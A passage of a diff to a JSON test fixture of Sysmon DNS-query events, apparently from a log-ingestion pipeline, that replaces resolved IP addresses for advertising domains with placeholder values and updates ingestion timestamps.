(x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15985,7 +15809,7 @@ "type": "CNAME" }, { - "data": "98.139.225.43", + "data": "89.160.20.156", "type": "A" }, { @@ -15993,19 +15817,19 @@ "type": "A" }, { - "data": "72.30.3.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "216.155.194.56", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "98.139.225.43", + "89.160.20.156", "98.138.49.44", - "72.30.3.43", - "216.155.194.56" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -16021,16 +15845,14 @@ "ads.yahoo.com" ], "ip": [ - "98.139.225.43", - "98.138.49.44", - "72.30.3.43", - "216.155.194.56" + "89.160.20.156", + "98.138.49.44" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742313400Z", + "ingested": "2021-12-09T13:50:23.457474500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:98.139.225.43;::ffff:98.138.49.44;::ffff:72.30.3.43;::ffff:216.155.194.56;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:89.160.20.156;::ffff:98.138.49.44;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16097,22 +15919,22 @@ }, "answers": [ { - "data": "169.55.104.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "169.60.66.35", + "data": "89.160.20.156", "type": "A" }, { - "data": "169.61.103.241", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "169.55.104.49", - "169.60.66.35", - "169.61.103.241" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -16127,15 +15949,13 @@ "um.simpli.fi" ], "ip": [ - "169.55.104.49", - "169.60.66.35", - "169.61.103.241" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742321800Z", + "ingested": "2021-12-09T13:50:23.457480600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:169.55.104.49;::ffff:169.60.66.35;::ffff:169.61.103.241;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16195,11 +16015,11 @@ }, "answers": [ { - "data": "35.186.236.204", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -16207,7 +16027,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -16215,7 +16035,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -16223,7 +16043,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -16231,7 +16051,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -16240,16 +16060,16 @@ } ], "resolved_ip": [ - "35.186.236.204", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, @@ -16265,23 +16085,23 @@ "mpp.vindicosuite.com" ], "ip": [ - "35.186.236.204", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742330100Z", + "ingested": "2021-12-09T13:50:23.457486400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.236.204;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16341,12 +16161,12 @@ }, "answers": [ { - "data": "8.41.222.152", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "8.41.222.152" + "89.160.20.156" ] }, "network": { @@ -16361,13 +16181,13 @@ "sync.1rx.io" ], "ip": [ - "8.41.222.152" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742338400Z", + "ingested": "2021-12-09T13:50:23.457492500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:8.41.222.152;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16435,12 +16255,12 @@ "type": "CNAME" }, { - "data": "23.52.160.7", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.160.7" + "89.160.20.156" ] }, "network": { @@ -16457,13 +16277,13 @@ "sync.teads.tv" ], "ip": [ - "23.52.160.7" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742347Z", + "ingested": "2021-12-09T13:50:23.457498200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:23.52.160.7;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16527,23 +16347,23 @@ "type": "CNAME" }, { - "data": "3.15.109.176", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.15.225.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.18.121.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.15.101.187", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -16551,7 +16371,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -16559,7 +16379,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -16567,22 +16387,22 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "3.15.109.176", - "52.15.225.252", - "3.18.121.79", - "3.15.101.187", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { @@ -16598,23 +16418,20 @@ "s.thebrighttag.com" ], "ip": [ - "3.15.109.176", - "52.15.225.252", - "3.18.121.79", - "3.15.101.187", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742355400Z", + "ingested": "2021-12-09T13:50:23.457504Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:3.15.109.176;::ffff:52.15.225.252;::ffff:3.18.121.79;::ffff:3.15.101.187;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 